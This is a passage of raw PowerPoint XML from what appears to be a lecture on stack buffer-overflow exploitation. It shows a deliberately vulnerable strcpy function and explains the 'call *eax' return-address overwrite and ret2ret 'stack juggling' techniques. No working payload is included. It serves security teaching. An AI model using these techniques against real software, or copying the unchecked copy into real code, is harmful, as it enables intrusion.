              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>msglog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>(char *input) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>[64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5556712" y="2864584"/>
            <a:ext cx="3276600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14541"/>
              <a:gd name="adj2" fmla="val -115278"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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Disassemble to find </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangular Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324929" y="4290159"/>
            <a:ext cx="3276600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -124994"/>
              <a:gd name="adj2" fmla="val -239088"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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Overwrite with address of call *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453407" y="1995714"/>
            <a:ext cx="1106879" cy="3973286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1106879 w 1106879"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3973286"/>
              <a:gd name="connsiteX1" fmla="*/ 164 w 1106879"/>
              <a:gd name="connsiteY1" fmla="*/ 2104572 h 3973286"/>
              <a:gd name="connsiteX2" fmla="*/ 1016164 w 1106879"/>
              <a:gd name="connsiteY2" fmla="*/ 3973286 h 3973286"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1106879" h="3973286">
                <a:moveTo>
                  <a:pt x="1106879" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="561081" y="721179"/>
                  <a:pt x="15283" y="1442358"/>
                  <a:pt x="164" y="2104572"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-14955" y="2766786"/>
                  <a:pt x="1016164" y="3973286"/>
                  <a:pt x="1016164" y="3973286"/>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2429122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8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nimBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38914" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>If there is a valuable (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> on a stack, you might consider this technique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="stack3.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90750" y="2540000"/>
            <a:ext cx="1690688" cy="418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138738" y="4132044"/>
            <a:ext cx="3767328" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2420938" y="4578350"/>
            <a:ext cx="1235075" cy="18796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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>overwrite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414588" y="4095750"/>
            <a:ext cx="124777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FFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>&amp;ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414588" y="3638550"/>
            <a:ext cx="124777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FFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>&amp;ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414588" y="3181350"/>
            <a:ext cx="124777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FFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>&amp;ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="944563" y="4318000"/>
            <a:ext cx="1246187" cy="369888"/>
            <a:chOff x="945163" y="4318669"/>
            <a:chExt cx="1245430" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Notched Right Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1521075" y="4469255"/>
              <a:ext cx="669518" cy="166436"/>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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38927" name="TextBox 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="945163" y="4318669"/>
              <a:ext cx="5326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latin typeface="Trebuchet MS" charset="0"/>
                </a:rPr>
                <a:t>esp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138738" y="4992469"/>
            <a:ext cx="3483721" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“stack juggling”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="2803525"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3662363" y="2752873"/>
            <a:ext cx="5403437" cy="892552"/>
            <a:chOff x="3662363" y="2752873"/>
            <a:chExt cx="5403437" cy="892552"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3662363" y="2911884"/>
              <a:ext cx="1264043" cy="25655"/>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953000" y="2752873"/>
              <a:ext cx="4112800" cy="892552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>(usually resides in</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>buf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>, but how to point there?)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651426" y="2963714"/>
            <a:ext cx="829100" cy="2875509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 829100"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2875509"/>
              <a:gd name="connsiteX1" fmla="*/ 829068 w 829100"/>
              <a:gd name="connsiteY1" fmla="*/ 1234881 h 2875509"/>
              <a:gd name="connsiteX2" fmla="*/ 35280 w 829100"/>
              <a:gd name="connsiteY2" fmla="*/ 2875509 h 2875509"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="829100" h="2875509">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="411594" y="377815"/>
                  <a:pt x="823188" y="755630"/>
                  <a:pt x="829068" y="1234881"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="834948" y="1714132"/>
                  <a:pt x="35280" y="2875509"/>
                  <a:pt x="35280" y="2875509"/>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2319155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0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.00046 L -4.68934E-6 -0.05738 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2846"/>
                                    </p:animMotion>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4.68934E-6 -0.05738 L -4.68934E-6 -0.12518 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3401"/>
                                    </p:animMotion>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.12541 L -4.68934E-6 -0.1969 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3586"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="44" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.1969 L -4.68934E-6 -0.2559 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>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4" grpId="0"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2ret (stack juggling)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38914" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
